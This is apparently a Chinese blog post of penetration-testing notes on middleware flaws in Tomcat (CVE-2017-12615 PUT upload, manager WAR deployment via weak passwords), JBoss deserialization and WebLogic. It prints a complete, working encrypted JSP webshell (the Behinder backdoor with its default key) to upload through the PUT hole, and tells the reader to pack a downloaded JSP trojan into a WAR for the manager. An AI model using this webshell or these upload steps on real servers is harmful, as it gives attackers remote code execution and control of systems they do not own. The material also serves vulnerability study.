web之中间件漏洞
jsp中间件
tomcat漏洞利用
tomcat服务器是一个免费的开放源代码的web应用服务器,通常用于jsp
cve-2017-12615了解:
- 漏洞成因:tomcat运行在windows主机上,且启用了http put请求方法,可通过构造的攻击请求向服务器上传包含任意代码的jsp文件,造成任意代码执行
- 影响版本 apache tomcat 7.0.0-7.0.81
- 在tomcat安装目录下的conf文件夹下的配置文件web.xml中的org.apache.catalina.servlets.DefaultServlet方法下如果该方法有如下代码,即表示tomcat已开启put方法,默认情况下http put是不开启的
直接put上传exp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
通用漏洞:
tomcat远程部署漏洞
- 漏洞产生:这是JSP/PHP网站远程部署的一个工具,管理员只需要远程上传一个WAR格式的文件,便可以发布到网站,方便了开发人员部署代码的同时,也方便了攻击者上传木马。
- 漏洞危害:入侵者可以通过构造war进行上传木马文件 ,从而控制服务器。
从网上扒一个jsp的小马,jar cvf 命令压缩为war木马上传 - 漏洞检测:通过访问:Http://localhost:8080/manager管理地址,尝试弱口令或默认口令,若能登陆成功,则存在此漏洞。
弹框登录:基础认证
401认证失败
Jboss漏洞利用
- 漏洞原因:经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后利用apache Commons Collections中的Gadget执行任意代码
- 漏洞利用:直接用反序列化工具进行检测 cve-2017-12149 JBoss反序列化
weblogic
java应用服务器
- 常用端口7001
- 后台地址ip:7001/console
具体可看weblogic java反序列化
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通